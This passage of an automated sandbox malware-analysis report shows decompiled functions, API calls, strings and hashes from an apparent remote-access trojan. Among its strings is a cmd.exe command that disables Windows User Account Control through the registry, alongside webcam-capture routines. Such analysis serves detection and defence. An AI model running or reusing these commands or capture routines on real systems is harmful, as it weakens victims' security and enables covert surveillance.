CloseHandle.KERNEL32(?,?,?,?,?,0046E600,0046E63C), ref: 0040D637
CloseHandle.KERNEL32(?,?,?,?,?,0046E600,0046E63C), ref: 0040D63C

Strings

C:\Windows\System32\cmd.exe, xrefs: 0040D623
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D61E

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: e972bbdb19fc581a1521be6a6b84360bcaf573cf8652e10132a5f2755bce98e4
Instruction ID: f490e3e4e665ecb905acd3e2d8be5ab8d0c8e347414856c904d0006282b77b9b
Opcode Fuzzy Hash: e972bbdb19fc581a1521be6a6b84360bcaf573cf8652e10132a5f2755bce98e4
Instruction Fuzzy Hash: AEF096B6D002AC7ACB30ABE79C0DEDF7F7CEBC5B11F00046ABA04A6141D6745150C6B5

Uniqueness

Uniqueness Score: -1.00%

Function 004050BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004050BB(void* __ecx, void* __ebp, char _a4) {
				void* _t17;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t25;

				_t23 = __ecx;
				if( *((char*)(__ecx + 0x5c)) == 0) {
					return 0;
				}
				if(_a4 == 0) {
					_t26 = _t25 - 0x18;
					E00402053(_t17, _t25 - 0x18, _t21, __ebp, "Connection KeepAlive | Disabled");
					E00402053(_t17, _t26 - 0x18, _t21, __ebp, "!");
					E00417D02(_t17, _t22);
				}
				 *(_t23 + 0x64) = CreateEventA(0, 0, 0, 0);
				SetEvent( *(_t23 + 0x60));
				WaitForSingleObject( *(_t23 + 0x64), 0xffffffff);
				CloseHandle( *(_t23 + 0x64));
				return 1;
			}

0x004050bc
0x004050c2
0x00000000
0x00405121
0x004050c9
0x004050cb
0x004050d5
0x004050e4
0x004050e9
0x004050ee
0x00405100
0x00405103
0x0040510e
0x00405117
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046E278,00404E51,00000001,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?), ref: 004050F7
SetEvent.KERNEL32(?,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?), ref: 00405103
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?), ref: 0040510E
CloseHandle.KERNEL32(?,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?), ref: 00405117

Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C

Strings

Connection KeepAlive | Disabled, xrefs: 004050D0

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: Connection KeepAlive | Disabled
API String ID: 2993684571-3818284553
Opcode ID: ccc04e33269f927f9319738c41aaa95ac72cc46b0163937b61128dff8ddc71d6
Instruction ID: 3daacff4e580f91c1f6f350cf8ed44886530e4b4853787aac4da69d9b787ca2e
Opcode Fuzzy Hash: ccc04e33269f927f9319738c41aaa95ac72cc46b0163937b61128dff8ddc71d6
Instruction Fuzzy Hash: D5F0F6718043107FDF1037759D0EA6B3E98AB02354F04056EF841956F2D57888D0DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041764D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30
sleepCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041764D(WCHAR* __ecx) {
				void* __edi;
				void* _t7;
				void* _t11;
				void* _t12;
				WCHAR* _t14;
				void* _t16;
				void* _t17;

				_t18 = _t17 - 0x18;
				_t14 = __ecx;
				E00402053(_t7, _t17 - 0x18, _t11, _t16, "Alarm triggered");
				E00402053(_t7, _t18 - 0x18, _t11, _t16, "!");
				E00417D02(_t7, _t12);
				PlaySoundW(_t14, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}

0x0041764f
0x00417652
0x0041765b
0x0041766a
0x0041766f
0x0041768d
0x00417694
0x004176a1

APIs

Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041767F
PlaySoundW.WINMM(00000000,00000000), ref: 0041768D
Sleep.KERNEL32(00002710), ref: 00417694
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041769D

Strings

Alarm triggered, xrefs: 00417656

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered
API String ID: 614609389-2816303416
Opcode ID: 9542b2003c5b813338b895ba0861b8ba11aa88615a0e2d5775900646b1513686
Instruction ID: 093683bbb276e0548a1b3f5a76380a34081b9d11d2653b5212bde0071ce3c36d
Opcode Fuzzy Hash: 9542b2003c5b813338b895ba0861b8ba11aa88615a0e2d5775900646b1513686
Instruction Fuzzy Hash: 5FE09222A04260379510337B7C0FD6F2D38CAC3BA570101AEFA04A6092DD58084286FB

Uniqueness

Uniqueness Score: -1.00%

Function 0043A6FA Relevance: 7.7, APIs: 5, Instructions: 222
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E0043A6FA(void* __ebx, void* __edx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				intOrPtr _v44;
				char _v48;
				signed int _t59;
				char* _t61;
				intOrPtr _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				void* _t106;
				intOrPtr _t108;
				intOrPtr _t109;
				int _t110;
				short* _t113;
				int _t114;
				int _t116;
				signed int _t117;

				_t106 = __edx;
				_t59 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t59 ^ _t117;
				_t61 = _a4;
				_t91 = _a12;
				_t116 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t113 = _a8;
				_v24 = _t113;
				if(_t61 == 0 || _t91 != 0) {
					if(_t113 != 0) {
						E004370F7(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
								if(_t64 == 0 || _v20 != _t116) {
									L55:
									_t65 = E00439941();
									_t114 = _t113 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t114 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t113 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t114 = _t116;
								goto L56;
							}
							while(_t68 <= 0xff) {
								_t113 =  &(_t113[1]);
								_t116 = _t116 + 1;
								_t68 =  *_t113 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t108 = _v44;
						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
							if( *((intOrPtr*)(_t108 + 4)) != 1) {
								_t114 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
								if(_t114 == 0) {
									if(_v20 != _t116 || GetLastError() != 0x7a) {
										L45:
										_t71 = E00439941();
										_t116 = _t116 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t109 = _v44;
											_t103 =  *(_t109 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t109 + 8), _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
											_t93 = _a12;
											_t110 = _t74;
											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
												goto L55;
											}
											if(_t110 + _t114 > _t93) {
												goto L56;
											}
											_t76 = _t116;
											_v32 = _t76;
											if(_t110 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t114 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
												 *((char*)(_t105 + _t114)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t114 = _t114 + 1;
												_v32 = _t76;
												if(_t76 < _t110) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t116) {
									goto L45;
								}
								_t28 = _t114 - 1; // -1
								_t116 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t116 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
								if(_t116 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t116 - 1] == 0) {
										_t116 = _t116 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t113;
							_v24 = _t91;
							while( *_t83 != _t116) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t116 &&  *_t83 == _t116) {
								_t91 = (_t83 - _t113 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						while( *_t113 <= 0xff) {
							_t98[_t116] =  *_t113;
							_t85 =  *_t113;
							_t113 =  &(_t113[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t116 = _t116 + 1;
							if(_t116 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E00439941())) = 0x16;
					E0043862C();
					goto L59;
				} else {
					L59:
					return E004318FB(_v8 ^ _t117);
				}
			}

0x0043a6fa
0x0043a702
0x0043a709
0x0043a70c
0x0043a710
0x0043a714
0x0043a716
0x0043a719
0x0043a71d
0x0043a720
0x0043a725
0x0043a734
0x0043a754
0x0043a759
0x0043a75e
0x0043a8fb
0x0043a904
0x0043a936
0x0043a93e
0x0043a94a
0x0043a94a
0x0043a94f
0x0043a952
0x00000000
0x0043a945
0x0043a945
0x0043a945
0x0043a958
0x0043a95c
0x0043a961
0x0043a961
0x00000000
0x0043a968
0x0043a93e
0x0043a906
0x0043a90c
0x0043a924
0x0043a924
0x00000000
0x0043a924
0x0043a913
0x0043a918
0x0043a91b
0x0043a91c
0x0043a922
0x00000000
0x00000000
0x00000000
0x0043a922
0x00000000
0x0043a913
0x0043a764
0x0043a76d
0x0043a7a7
0x0043a820
0x0043a824
0x0043a83a
0x0043a8eb
0x0043a8eb
0x0043a8f0
0x0043a8f3
0x00000000
0x0043a84f
0x0043a851
0x00000000
0x00000000
0x0043a857
0x0043a85a
0x0043a85a
0x0043a85d
0x0043a863
0x0043a867
0x0043a867
0x0043a879
0x0043a87f
0x0043a882
0x0043a886
0x00000000
0x00000000
0x0043a8ab
0x00000000
0x00000000
0x0043a8b1
0x0043a8b3
0x0043a8b8
0x0043a8d8
0x0043a8db
0x0043a8de
0x0043a8e3
0x00000000
0x00000000
0x00000000
0x0043a8e9
0x0043a8ba
0x0043a8bd
0x0043a8bd
0x0043a8c1
0x0043a8c6
0x00000000
0x00000000
0x0043a8cf
0x0043a8d0
0x0043a8d1
0x0043a8d6
0x00000000
0x00000000
0x00000000
0x0043a8d6
0x00000000
0x0043a8bd
0x00000000
0x0043a85a
0x0043a83a
0x0043a829
0x00000000
0x00000000
0x0043a82f
0x0043a82f
0x00000000
0x0043a82f
0x0043a7ab
0x0043a7d1
0x0043a7e4
0x0043a7e8
0x00000000
0x0043a7f8
0x0043a800
0x0043a806
0x0043a806
0x00000000
0x0043a800
0x0043a7e8
0x0043a7ad
0x0043a7af
0x0043a7b2
0x0043a7b7
0x0043a7ba
0x0043a7ba
0x0043a7be
0x00000000
0x00000000
0x00000000
0x0043a7be
0x0043a7c3
0x0043a7d0
0x0043a7d0
0x00000000
0x0043a7c3
0x0043a771
0x00000000
0x00000000
0x0043a77c
0x0043a787
0x0043a78a
0x0043a78d
0x0043a793
0x00000000
0x00000000
0x0043a799
0x0043a79c
0x00000000
0x00000000
0x00000000
0x0043a79e
0x00000000
0x0043a77c
0x0043a73b
0x0043a741
0x00000000
0x0043a72b
0x0043a96a
0x0043a97a
0x0043a97a

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e5e9f6e3dd4fc194e56f70beaac292661377ef14ebe3d1fc397c4a9d6b47518
Instruction ID: 49609b8c9c045d692caab616a8392ee6606f9b34eea959ce6d98c2d375fbb8f2
Opcode Fuzzy Hash: 0e5e9f6e3dd4fc194e56f70beaac292661377ef14ebe3d1fc397c4a9d6b47518
Instruction Fuzzy Hash: FA71067194021ADBCB21DF58C884BBFBB74EF59324F25662BE49077280C7788D51C79A

Uniqueness

Uniqueness Score: -1.00%

Function 00404331 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206
sleepCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00404331(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, char** _a4, signed int _a8, intOrPtr _a12) {
				char _v4;
				void* _v36;
				char _v40;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				void* __esi;
				void* _t24;
				char** _t26;
				intOrPtr* _t28;
				char* _t36;
				intOrPtr _t46;
				signed int _t55;
				signed int _t57;
				char* _t60;
				void* _t63;
				signed int _t64;
				void* _t66;
				signed int _t75;
				void* _t78;
				void* _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				signed int _t136;
				void* _t139;
				signed int _t140;
				char* _t142;
				signed int _t144;
				void* _t147;
				void* _t148;
				intOrPtr* _t149;

				_push(__edi);
				_t122 = _a8;
				_t127 = __ecx;
				_t24 = E0040276C(__ecx, _a8);
				_t78 = _t127;
				_t156 = _t24;
				if(_t24 == 0) {
					_push(__ebx);
					E00402848(_t78, __edx, _t139, 0);
					_t26 = E004021FD();
					_t75 = _a8;
					_a4 = _t26;
					_t117 =  *_t26;
					__eflags =  !_t117 - _t75;
					if( !_t117 <= _t75) {
						E00402864(_t127, _t139);
						asm("int3");
						_t140 = _t144;
						_push(_t127);
						_t28 = E00401F6B( &_v4);
						E00404162( &_v4,  &_v40, 4, 0xffffffff);
						_t147 = (_t144 & 0xfffffff8) - 0xc;
						E004020B6(_t75, _t147, _t117, __eflags, 0x46e260);
						_t148 = _t147 - 0x18;
						E004020B6(_t75, _t148, _t117, __eflags,  &_v56);
						E0041851D( &_v72, _t117);
						_t149 = _t148 + 0x30;
						_t129 =  *_t28 - 0x3c;
						__eflags = _t129;
						if(__eflags == 0) {
							E00401E25( &_v48, _t117, _t140, __eflags, 0);
							_t36 = E0040243C();
							E00401F6B(E00401E25( &_v52, _t117, _t140, __eflags, 0));
							_t117 = _t36;
							_t131 = E0040F872();
							__eflags = _t131;
							if(_t131 != 0) {
								 *0x46dac4 = E0040FAE7(_t131, "OpenCamera");
								 *0x46dac0 = E0040FAE7(_t131, "CloseCamera");
								_t46 = E0040FAE7(_t131, "GetFrame");
								_t117 = "FreeFrame";
								 *0x46dac8 = _t46;
								 *0x46dabc = E0040FAE7(_t131, "FreeFrame");
								 *0x46daaa = 1;
								E004020B6(_t75, _t149 - 0x18, "FreeFrame", __eflags, 0x46e1c8);
								_push(0x1b);
								goto L23;
							}
						} else {
							_t133 = _t129 - 1;
							__eflags = _t133;
							if(_t133 == 0) {
								__eflags =  *0x46da77;
								if(__eflags != 0) {
									goto L20;
								}
							} else {
								_t134 = _t133 - 1;
								__eflags = _t134;
								if(_t134 == 0) {
									 *0x46dac0();
									 *0x46da77 = 0;
								} else {
									_t135 = _t134 - 1;
									__eflags = _t135;
									if(_t135 == 0) {
										_t55 =  *0x46dac4();
										 *0x46da77 = _t55;
										__eflags = _t55;
										if(__eflags == 0) {
											goto L15;
										} else {
											L20:
											_t117 = E004383EC(_t50, E00401F6B(E00401E25( &_v48, _t117, _t140, __eflags, 0)));
											E004045C7(_a8, _t52, __eflags);
										}
									} else {
										_t136 = _t135 - 1;
										__eflags = _t136;
										if(_t136 == 0) {
											_t57 =  *0x46dac4();
											 *0x46da77 = _t57;
											__eflags = _t57;
											if(__eflags == 0) {
												L15:
												E004020B6(_t75, _t149 - 0x18, _t117, __eflags, 0x46e1c8);
												_push(0x41);
												L23:
												E00404A78(_a8, _t117, __eflags);
											} else {
												_t60 = E004383EC(_t58, E00401F6B(E00401E25( &_v48, _t117, _t140, __eflags, _t136)));
												 *_t149 = 0x3e8;
												Sleep(??);
												_t117 = _t60;
												E004045C7(_a8, _t60, __eflags);
												 *0x46dac0();
											}
										}
									}
								}
							}
						}
						E00401E4D( &_v48, _t117);
						E00401F98();
						E00401F98();
						__eflags = 0;
						return 0;
					} else {
						_push(_t139);
						_t142 =  &(_t117[_t75]);
						__eflags = _t75;
						if(_t75 != 0) {
							_t64 = E004027A6(_t75, _t127, _t117, _t122, _t142, 0);
							__eflags = _t64;
							if(_t64 != 0) {
								_t66 = E004021EA(_t127);
								E00401586(E004021EA(_t127) + _t75 * 2, _t66,  *_a8);
								E00401572(E004021EA(_t127), _t122, _t75);
								E00402817(_t142);
							}
						}
						_t63 = _t127;
						goto L7;
					}
				} else {
					_push(_a12);
					_t63 = E004034A6(__ebx, _t127, __edx, _t122 - E004021EA(_t78) >> 1, _t127, _t139, _t156, _t78, _t127, _t122 - E004021EA(_t78) >> 1);
					L7:
					return _t63;
				}
			}

0x00404332
0x00404333
0x00404337
0x0040433a
0x0040433f
0x00404341
0x00404343
0x0040435e
0x00404361
0x00404368
0x0040436d
0x00404371
0x00404375
0x0040437b
0x0040437d
0x004043db
0x004043e0
0x004043e2
0x004043ed
0x004043ee
0x00404401
0x00404406
0x00404410
0x00404415
0x0040441f
0x00404428
0x0040442d
0x00404430
0x00404430
0x00404433
0x00404513
0x0040451a
0x0040452e
0x00404533
0x0040453c
0x0040453e
0x00404540
0x00404553
0x00404564
0x0040456b
0x00404570
0x00404575
0x00404584
0x0040458b
0x00404597
0x0040459c
0x00000000
0x0040459c
0x00404439
0x00404439
0x00404439
0x0040443c
0x004044d8
0x004044df
0x00000000
0x00000000
0x00404442
0x00404442
0x00404442
0x00404445
0x004044c6
0x004044cc
0x00404447
0x00404447
0x00404447
0x0040444a
0x004044b5
0x004044bb
0x004044c0
0x004044c2
0x00000000
0x004044c4
0x004044e5
0x00404501
0x00404503
0x00404503
0x0040444c
0x0040444c
0x0040444c
0x0040444f
0x00404455
0x0040445b
0x00404460
0x00404462
0x0040449f
0x004044a9
0x004044ae
0x0040459e
0x004045a1
0x00404464
0x00404476
0x0040447d
0x00404484
0x0040448d
0x0040448f
0x00404494
0x00404494
0x00404462
0x0040444f
0x0040444a
0x00404445
0x0040443c
0x004045aa
0x004045b3
0x004045bb
0x004045c0
0x004045c6
0x0040437f
0x0040437f
0x00404380
0x00404383
0x00404385
0x0040438c
0x00404391
0x00404393
0x0040439d
0x004043ae
0x004043c0
0x004043cb
0x004043cb
0x00404393
0x004043d1
0x00000000
0x004043d3
0x00404345
0x00404345
0x00404357
0x004043d4
0x004043d6
0x004043d6

APIs

Part of subcall function 00402864: std::_Xinvalid_argument.LIBCPMT ref: 00402869

Sleep.KERNEL32(00000000,0040B098), ref: 00404484

Part of subcall function 004045C7: __EH_prolog.LIBCMT ref: 004045CC

Strings

CloseCamera, xrefs: 0040454E
OpenCamera, xrefs: 00404542
GetFrame, xrefs: 0040455F
FreeFrame, xrefs: 00404570

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: H_prologSleepXinvalid_argumentstd::_
String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
API String ID: 834325642-3547787478
Opcode ID: c496853f038861f90756788e13719cdd24ac2683f914fefd35977560dbb8a89d
Instruction ID: 89c517a1881bf8512d00cff5985444bc52faea261af312299454f9d6a2ce3894
Opcode Fuzzy Hash: c496853f038861f90756788e13719cdd24ac2683f914fefd35977560dbb8a89d
Instruction Fuzzy Hash: 3F51E6B1F0820067CA14BB769C1AA6E36A55BC5718F04043FFA05B76D2EF7C8905869F

Uniqueness

Uniqueness Score: -1.00%

Function 00440DBB Relevance: 7.7, APIs: 5, Instructions: 187
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E00440DBB(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t241;
				void* _t244;
				signed int _t247;
				signed int _t249;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t261;
				signed int _t263;
				void* _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t273;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				intOrPtr _t283;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				intOrPtr _t293;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				signed int _t319;
				signed int _t320;
				signed int _t323;
				signed int _t328;
				void* _t330;
				signed int _t332;
				void* _t333;
				intOrPtr _t334;
				signed int _t339;
				signed int _t340;
				intOrPtr* _t343;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				intOrPtr* _t362;
				signed int _t364;
				signed int _t370;
				intOrPtr* _t374;
				intOrPtr* _t377;
				void* _t380;
				intOrPtr* _t381;
				intOrPtr* _t382;
				signed int _t393;
				signed int _t396;
				intOrPtr* _t397;
				signed int _t399;
				signed int* _t403;
				intOrPtr* _t410;
				intOrPtr* _t411;
				signed int _t421;
				short _t422;
				void* _t424;
				signed int _t425;
				signed int _t427;
				intOrPtr _t428;
				signed int _t431;
				intOrPtr _t432;
				signed int _t434;
				signed int _t437;
				intOrPtr _t443;
				signed int _t444;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				signed int _t452;
				signed int _t456;
				signed int* _t457;
				intOrPtr* _t458;
				short _t459;
				void* _t461;
				signed int _t463;
				signed int _t465;
				void* _t467;
				void* _t468;
				void* _t470;
				signed int _t471;
				void* _t472;
				void* _t474;
				signed int _t475;
				void* _t477;
				void* _t479;
				intOrPtr _t491;

				_t420 = __edx;
				_t461 = _t467;
				_t468 = _t467 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t357 = E004421F7(__ecx, 0x6a6);
				_t240 = 0;
				_pop(_t370);
				if(_t357 == 0) {
					L20:
					return _t240;
				} else {
					_push(__edi);
					_t2 = _t357 + 4; // 0x4
					_t427 = _t2;
					 *_t427 = 0;
					 *_t357 = 1;
					_t443 = _a4;
					_t4 = _t443 + 0x30; // 0x4405ba
					_t241 = _t4;
					_push( *_t241);
					_v16 = _t241;
					_push(0x458550);
					_push( *0x45840c);
					E00440CFA(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
					_t470 = _t468 + 0x18;
					_v8 = 0x45840c;
					while(1) {
						L2:
						_t244 = E0044BCF8(_t427, 0x351, ";");
						_t471 = _t470 + 0xc;
						if(_t244 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t410 = _t8;
							_t339 =  *_v16;
							_v16 = _t410;
							_t411 =  *_t410;
							goto L4;
						}
						while(1) {
							L4:
							_t420 =  *_t339;
							if(_t420 !=  *_t411) {
								break;
							}
							if(_t420 == 0) {
								L8:
								_t340 = 0;
							} else {
								_t420 =  *((intOrPtr*)(_t339 + 2));
								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
									break;
								} else {
									_t339 = _t339 + 4;
									_t411 = _t411 + 4;
									if(_t420 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t370 = _v8 + 0xc;
							_v8 = _t370;
							_v12 = _v12 &  !( ~_t340);
							_t343 = _v16;
							_v16 = _t343;
							_push( *_t343);
							_push(0x458550);
							_push( *_t370);
							E00440CFA(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
							_t470 = _t471 + 0x18;
							if(_v8 < 0x45843c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E004427C2(_t357);
									_t31 = _t443 + 0x28; // 0x30ff068b
									_t434 = _t427 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t443 + 0x28; // 0x30ff068b
											E004427C2( *_t32);
										}
									}
									_t33 = _t443 + 0x24; // 0x30ff0c46
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t434 == 1;
										if(_t434 == 1) {
											_t34 = _t443 + 0x24; // 0x30ff0c46
											E004427C2( *_t34);
										}
									}
									 *(_t443 + 0x24) = 0;
									 *(_t443 + 0x1c) = 0;
									 *(_t443 + 0x28) = 0;
									 *((intOrPtr*)(_t443 + 0x20)) = 0;
									_t39 = _t443 + 0x40; // 0x10468b00
									_t240 =  *_t39;
								} else {
									_t20 = _t443 + 0x28; // 0x30ff068b
									_t437 = _t427 | 0xffffffff;
									_t491 =  *_t20;
									if(_t491 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t491 == 0) {
											_t21 = _t443 + 0x28; // 0x30ff068b
											E004427C2( *_t21);
										}
									}
									_t22 = _t443 + 0x24; // 0x30ff0c46
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t437 == 1) {
											_t23 = _t443 + 0x24; // 0x30ff0c46
											E004427C2( *_t23);
										}
									}
									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
									_t26 = _t357 + 4; // 0x4
									_t240 = _t26;
									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
									 *(_t443 + 0x28) = _t357;
									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
								}
								goto L20;
							}
							goto L130;
						}
						asm("sbb eax, eax");
						_t340 = _t339 | 0x00000001;
						__eflags = _t340;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00438659();
					asm("int3");
					_push(_t461);
					_t463 = _t471;
					_t472 = _t471 - 0x1d0;
					_t247 =  *0x46c00c; // 0xe1ce05e9
					_v56 = _t247 ^ _t463;
					_t249 = _v40;
					_push(_t357);
					_push(_t443);
					_t444 = _v36;
					_push(_t427);
					_t428 = _v44;
					_v508 = _t428;
					__eflags = _t249;
					if(_t249 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t359 = 0;
						_v452 = 0;
						__eflags = _t444;
						if(__eflags == 0) {
							L79:
							E00440DBB(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
							goto L80;
						} else {
							__eflags =  *_t444 - 0x4c;
							if( *_t444 != 0x4c) {
								L58:
								_push(0);
								_t255 = E00440983(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
								_t474 = _t472 + 0x18;
								__eflags = _t255;
								if(_t255 != 0) {
									_t370 = 0;
									__eflags = 0;
									_t76 = _t428 + 0x20; // 0x4405aa
									_t421 = _t76;
									_t446 = 0;
									_v452 = _t421;
									do {
										__eflags = _t446;
										if(_t446 == 0) {
											L73:
											_t256 = _v456;
										} else {
											_t374 =  *_t421;
											_t257 =  &_v276;
											while(1) {
												__eflags =  *_t257 -  *_t374;
												_t428 = _v464;
												if( *_t257 !=  *_t374) {
													break;
												}
